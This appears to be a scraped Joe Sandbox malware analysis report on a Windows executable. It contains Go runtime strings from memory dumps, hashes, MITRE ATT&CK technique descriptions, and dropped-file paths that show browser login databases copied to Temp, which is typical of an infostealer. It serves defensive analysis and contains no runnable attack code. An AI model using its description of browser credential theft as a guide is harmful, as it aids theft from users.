stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativeVirtualQuery for stack base faileddoaddtimer: P already set in timerforEachP: sched.safePointWait != 0invalid nested repetition operatorinvalid or unsupported Pe, xrefs: 000002EBF9BD86ED
out of memory (stackalloc)persistentalloc: size == 0shrinking stack in libcallstartlockedm: locked to metracing is already enableduse of invalid sweepLockerwakep: negative nmspinningCurveP256CurveP384CurveP521G waiting list is corruptedSec-WebSocket-Version: 1, xrefs: 000002EBF9BD84E4
stack size not a power of 2stopTheWorld: holding lockstimer when must be positivetoo many callback functionswork.nwait was > work.nprocFixedStack is not power-of-2comparing uncomparable type fatal: morestack on gsignalfindrunnable: netpoll with pfound pointer, xrefs: 000002EBF9BD86DC
out of memoryprofMemActiveprofMemFuturestart tracingtraceStackTabvalue method winpty/amd64/xadd64 failedxchg64 failed to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no , xrefs: 000002EBF9BD85BD

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: out of memory (stackalloc)persistentalloc: size == 0shrinking stack in libcallstartlockedm: locked to metracing is already enableduse of invalid sweepLockerwakep: negative nmspinningCurveP256CurveP384CurveP521G waiting list is corruptedSec-WebSocket-Version: 1$out of memoryprofMemActiveprofMemFuturestart tracingtraceStackTabvalue method winpty/amd64/xadd64 failedxchg64 failed to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no $stack size not a power of 2stopTheWorld: holding lockstimer when must be positivetoo many callback functionswork.nwait was > work.nprocFixedStack is not power-of-2comparing uncomparable type fatal: morestack on gsignalfindrunnable: netpoll with pfound pointer$stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativeVirtualQuery for stack base faileddoaddtimer: P already set in timerforEachP: sched.safePointWait != 0invalid nested repetition operatorinvalid or unsupported Pe
API String ID: 0-2253855418
Opcode ID: e9956b2a1e18ec577f3c9a651a277a083cee515331899a877c6336a23943b848
Instruction ID: a8b6296689747934cef03462aa31b03bfee1c525673c2e9273fad462eca24930
Opcode Fuzzy Hash: e9956b2a1e18ec577f3c9a651a277a083cee515331899a877c6336a23943b848
Instruction Fuzzy Hash: AA71A232284AD486EB0A9B91E89836BB7A5F789F94F544026FB4D47FA6DF38C441C740

Function 000002EBF9B9D6C0 Relevance: 5.2, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

runtime: cannot allocate memoryruntime: failed to commit pagesruntime: profBuf already closedsignal_recv: inconsistent stateslice bounds out of range [%x:]slice bounds out of range [:%x]unsafe.String: len out of rangewriteBytes with unfinished bits (types from, xrefs: 000002EBF9B9D8FE
persistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: inconsistent read deadlinetraceback did not unwind completely0123456789abcdefghijklmnopqrstuvwxyzGo pointer stored into non-Go memoryUnable to det, xrefs: 000002EBF9B9D91F
persistentalloc: size == 0shrinking stack in libcallstartlockedm: locked to metracing is already enableduse of invalid sweepLockerwakep: negative nmspinningCurveP256CurveP384CurveP521G waiting list is corruptedSec-WebSocket-Version: 13address not a stack add, xrefs: 000002EBF9B9D945
persistentalloc: align is not a power of 2runtime: blocked write on closing polldescsweep: tried to preserve a user arena spanunexpected signal during runtime executiongcBgMarkWorker: unexpected gcMarkWorkerModegrew heap, but no adequate free space foundmeasur, xrefs: 000002EBF9B9D930

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: persistentalloc: align is not a power of 2runtime: blocked write on closing polldescsweep: tried to preserve a user arena spanunexpected signal during runtime executiongcBgMarkWorker: unexpected gcMarkWorkerModegrew heap, but no adequate free space foundmeasur$persistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: inconsistent read deadlinetraceback did not unwind completely0123456789abcdefghijklmnopqrstuvwxyzGo pointer stored into non-Go memoryUnable to det$persistentalloc: size == 0shrinking stack in libcallstartlockedm: locked to metracing is already enableduse of invalid sweepLockerwakep: negative nmspinningCurveP256CurveP384CurveP521G waiting list is corruptedSec-WebSocket-Version: 13address not a stack add$runtime: cannot allocate memoryruntime: failed to commit pagesruntime: profBuf already closedsignal_recv: inconsistent stateslice bounds out of range [%x:]slice bounds out of range [:%x]unsafe.String: len out of rangewriteBytes with unfinished bits (types from
API String ID: 0-1850783346
Opcode ID: bbbe6808f2e1630b2ec2fbded755a8d13a1fe5449977e161c2870d9bdb906eb2
Instruction ID: 5006c1844189acf317d11f021a66c290f90b2f8f2fefedee1986f804513a5977
Opcode Fuzzy Hash: bbbe6808f2e1630b2ec2fbded755a8d13a1fe5449977e161c2870d9bdb906eb2
Instruction Fuzzy Hash: E1719E72655BC485EB569F86F88839AB765F789B84F545022FB8D03F6ACB38C445C700

Function 000002EBF9BA5A20 Relevance: 5.1, Strings: 4, Instructions: 131COMMON

Download Yara Rule

Strings

span has no free spacestack not a power of 2trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p state", missing CPU supportchan receive (nil chan)close of closed channelfailed to verify entityfatal: morestack on g0garbage colle, xrefs: 000002EBF9BA5BF1
refill of span with free space remainingruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsattempted to add zero-sized address rangegcSweep being done but phase is not GCoffmheap.freeSpanLock, xrefs: 000002EBF9BA5C36
bad sweepgen in refillcall not at safe pointcompileCallabck: type duplicated defer entryduplicatehandle failedfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc inv, xrefs: 000002EBF9BA5C25
out of memoryprofMemActiveprofMemFuturestart tracingtraceStackTabvalue method winpty/amd64/xadd64 failedxchg64 failed to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no , xrefs: 000002EBF9BA5C05

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: bad sweepgen in refillcall not at safe pointcompileCallabck: type duplicated defer entryduplicatehandle failedfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc inv$out of memoryprofMemActiveprofMemFuturestart tracingtraceStackTabvalue method winpty/amd64/xadd64 failedxchg64 failed to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no $refill of span with free space remainingruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsattempted to add zero-sized address rangegcSweep being done but phase is not GCoffmheap.freeSpanLock$span has no free spacestack not a power of 2trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p state", missing CPU supportchan receive (nil chan)close of closed channelfailed to verify entityfatal: morestack on g0garbage colle
API String ID: 0-4077066282
Opcode ID: 91022ff40c250b0f6da16b6389fc54fad4a4717e4d516f6420a48add9a58464e
Instruction ID: b80b368b7f6373d6d5db896b13b302b3fe563c80021b8447304f5f2e4a3fb66f
Opcode Fuzzy Hash: 91022ff40c250b0f6da16b6389fc54fad4a4717e4d516f6420a48add9a58464e
Instruction Fuzzy Hash: C751CD72284A9486EB169B05E89439EB7B5F78AB84F544022FB8D03FAADF3CC545C750

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report O16AWEA5iQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\browser_data1097302165\Local State

C:\Users\user\AppData\Local\Temp\browser_data1097302165\Login Data

C:\Users\user\AppData\Local\Temp\browser_data2454273873\Local State

C:\Users\user\AppData\Local\Temp\browser_data2454273873\Login Data

\Device\Mup\user-PC\PIPE\samr

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

DNS Queries

Windows Analysis Report
O16AWEA5iQ.exe

Function 000002EBD2AD0000 Relevance: 70.5, APIs: 9, Strings: 31, Instructions: 459
libraryCOMMON

Function 000002EBD2AD0008 Relevance: 66.9, APIs: 7, Strings: 31, Instructions: 390
libraryCOMMON

Function 000002EBF9BA7700 Relevance: 14.1, Strings: 11, Instructions: 351
COMMON

Function 000002EBF9B97F80 Relevance: 12.7, Strings: 10, Instructions: 194
COMMON

Function 000002EBF9B98800 Relevance: 10.2, Strings: 8, Instructions: 167
COMMON

Function 000002EBF9B915C0 Relevance: 9.2, Strings: 7, Instructions: 445
COMMON

Function 000002EBF9B91060 Relevance: 9.1, Strings: 7, Instructions: 306
COMMON

Function 000002EBF9B993A0 Relevance: 8.9, Strings: 7, Instructions: 170
COMMON

Function 000002EBF9BBF920 Relevance: 8.8, Strings: 7, Instructions: 68
COMMON

Function 000002EBF9BA78F6 Relevance: 7.6, Strings: 6, Instructions: 113
COMMON

Function 000002EBF9BA78F0 Relevance: 7.6, Strings: 6, Instructions: 113
COMMON